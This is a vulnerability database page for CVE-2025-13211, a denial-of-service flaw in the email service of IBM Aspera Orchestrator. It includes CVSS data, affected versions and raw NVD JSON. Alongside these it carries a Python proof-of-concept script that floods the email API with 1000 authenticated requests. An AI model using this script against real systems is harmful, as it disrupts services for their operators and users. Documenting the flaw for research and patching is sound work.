Security Vulnerability Report
中文
CVE-2025-13211 CVSS 5.3 MEDIUM

CVE-2025-13211

Published: 2025-12-11 20:15:53
Last Modified: 2025-12-15 19:04:29

Description

IBM Aspera Orchestrator 4.0.0 through 4.1.0 could allow an authenticated user to cause a denial of service in the email service due to improper control of interaction frequency.

CVSS Details

CVSS Score
5.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L

Configurations (Affected Products)

cpe:2.3:a:ibm:aspera_orchestrator:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:linux:linux_kernel:-:*:*:*:*:*:*:* - NOT VULNERABLE
IBM Aspera Orchestrator 4.0.0
IBM Aspera Orchestrator 4.1.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
#!/usr/bin/env python3 """ CVE-2025-13211 PoC - IBM Aspera Orchestrator Email Service DoS Note: This is a conceptual PoC for educational purposes only. """ import requests import time import sys TARGET_URL = "https://target-ip:port/api/v1/email" AUTH_TOKEN = "your-authentication-token" def send_email_request(session, payload): headers = { "Authorization": f"Bearer {AUTH_TOKEN}", "Content-Type": "application/json" } try: response = session.post(TARGET_URL, json=payload, headers=headers, timeout=5) return response.status_code except requests.exceptions.RequestException: return None def exploit_dos(): session = requests.Session() payload = { "to": "[email protected]", "subject": "Test Email", "body": "DoS test payload" } print("[*] Starting DoS attack on IBM Aspera Orchestrator email service...") request_count = 0 for i in range(1000): status = send_email_request(session, payload) request_count += 1 if i % 100 == 0: print(f"[*] Sent {request_count} requests...") time.sleep(0.1) # Adjust frequency as needed print(f"[+] Completed {request_count} requests. Service should be affected.") if __name__ == "__main__": exploit_dos()

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-13211", "sourceIdentifier": "[email protected]", "published": "2025-12-11T20:15:52.880", "lastModified": "2025-12-15T19:04:29.383", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "IBM Aspera Orchestrator 4.0.0 through 4.1.0 could allow an authenticated user to cause a denial of service in the email service due to improper control of interaction frequency."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "LOW"}, "exploitabilityScore": 3.9, "impactScore": 1.4}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-799"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:ibm:aspera_orchestrator:*:*:*:*:*:*:*:*", "versionStartIncluding": "4.0.0", "versionEndExcluding": "4.1.1", "matchCriteriaId": "ABABACFD-E349-45B4-980B-FD851738CFE6"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:o:linux:linux_kernel:-:*:*:*:*:*:*:*", "matchCriteriaId": "703AF700-7A70-47E2-BC3A-7FD03B3CA9C1"}]}]}], "references": [{"url": "https://www.ibm.com/support/pages/node/7254434", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}